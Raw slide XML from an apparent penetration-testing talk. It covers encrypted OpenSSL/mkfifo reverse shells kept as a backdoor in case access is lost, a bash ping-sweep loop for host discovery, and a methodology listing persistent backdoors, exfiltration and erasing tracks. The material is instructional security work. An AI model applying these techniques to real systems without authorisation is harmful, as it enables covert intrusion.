          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1561602" y="1608023"/>
            <a:ext cx="7419975" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD27B490-BBEE-41CB-9985-5136AE9A38E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4636655" y="3103448"/>
            <a:ext cx="0" cy="1385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53EDDC-671A-4756-927D-17DE63ABB678}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2676597" y="4498025"/>
            <a:ext cx="3920116" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>Unencrypted communications!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413540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AAFE9-4C57-42C7-B81C-96721E36451A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Encrypted Reverse Shells using OpenSSL/mkfifo</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC203705-5F66-431B-BC52-4CA8077BBE59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If you’re detected, you could end up with your SSH key removed from the target system and no access to return. This is where a secondary reverse shell can help. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Reverse shells can be obtained by other means such as Python, Perl however they are unencrypted!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>An encrypted backdoor can be made using self-signed SSL certificates with OpenSSL server/client. Using a payload of a temporary first-in-first-out (FIFO) filesystem with a /bin/sh shell providing encrypted communications </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2617285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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E69E8550-2D0D-49DE-98F9-CB392E416FC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5358261" y="3223492"/>
            <a:ext cx="0" cy="1934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E0A8EB1-A7F6-4146-8CFD-B4388E588178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4253219" y="3877396"/>
            <a:ext cx="1105042" cy="1280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8AAAFE9-4C57-42C7-B81C-96721E36451A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Encrypted Reverse Shells using OpenSSL/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mkfifo</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{443884AA-035B-4571-9E70-AC6316F7780A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="17466" b="72278"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="269297" y="2360036"/>
            <a:ext cx="9354993" cy="863456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81E5CC6F-5818-4CAC-B4D9-80370B126223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="269297" y="3391621"/>
            <a:ext cx="6477000" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AD50655-F455-4837-BEF2-E8EF05C6492E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="269297" y="4045525"/>
            <a:ext cx="10610850" cy="209550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7394AD67-B9E2-408E-9AB5-2A07DC991EA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="67681"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="269297" y="4423204"/>
            <a:ext cx="3276600" cy="1169794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C5E3286-A9D6-4C94-8045-1CD3CC04586A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8076859" y="4309213"/>
            <a:ext cx="0" cy="822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9A5AA3D-6002-4A1D-B5F0-806A41BA856E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6921664" y="5131333"/>
            <a:ext cx="2310391" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Reverse shell payload from target machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{749A3881-82D5-40C4-BD0B-E26EDC5A886F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4502180" y="5158078"/>
            <a:ext cx="1712162" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Make cert/key for self-signed encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Arrow Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3599CA33-12E4-46B0-8582-35B25EE31EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907597" y="5592998"/>
            <a:ext cx="0"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AD4D94D-E8B3-4ABE-B963-127A7243F50F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540191" y="6081408"/>
            <a:ext cx="2734810" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Reverse shell established</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24342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AE82-2154-4900-99A8-4D22D19FECDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Encrypted Communications!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6183301C-1132-4B93-AE57-F327016EDEAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2115029" y="1270000"/>
            <a:ext cx="5721278" cy="5188527"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1564713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B43E4C3-713B-458D-BA38-E75A7B4FD384}"/>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Host Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FF94F6E-89DC-4348-AA7B-8DA9EA4E6068}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host discovery is the process of discovering hosts on the internal network. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host discovery can usually be conducted automatically by tools such as NMAP, but within the internal network; a makeshift solution is needed such as: for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in {1..255}; do ping –c 1 (Internal 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>octects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | grep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using the internal bash shell to discover hosts in the internal network can help us to discover potential targets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ICMP has potential of being blocked, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Python can be used equally as well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to discover hosts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232451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03557A9-5C3B-4A2D-9110-02A791B1A4E6}"/>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How to port scan internally?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437B002E-CF5E-4B05-90EF-206D35956A35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once inside the network you are using the target machine as your grounds of operations, meaning your fancy tools (NMAP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Sparta) are not going to be available.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HPC environments are supposed to contain programming languages, using LOTL tactics, we can use these languages and make our own tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alternatively, we can use our fancy tools from our attacking machine via Proxychains, however in certain attack scenarios such as targeting IPv6 this may not always work so well. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339207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5B1E0373-E99D-4E73-B38A-8B7C58BED155}"/>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Internal Network Penetration Testing Methodology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BB8C059-2F0B-4D80-BDB1-460CCE8262C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Establish Access via SOCKS/Secondary Channel via Reverse Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Perform Host Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Port Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Firewalking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Probing/Enumeration of Internal Services (Username dumps, Vulnerable Versions, Credentials, IPv6 access) – Privilege Escalation more-like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Defence Evasion (Firewalls, Restricted Shells, VLANs.) – Separate talk(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Privilege Escalation (If identified opportunity) – Separate talk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Post-Exploitation (Persistent backdoors, Data exfiltration)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Erasing Tracks (Anti-Forensics)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143640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35BA6-DA48-4A49-91CE-96064ACE0083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
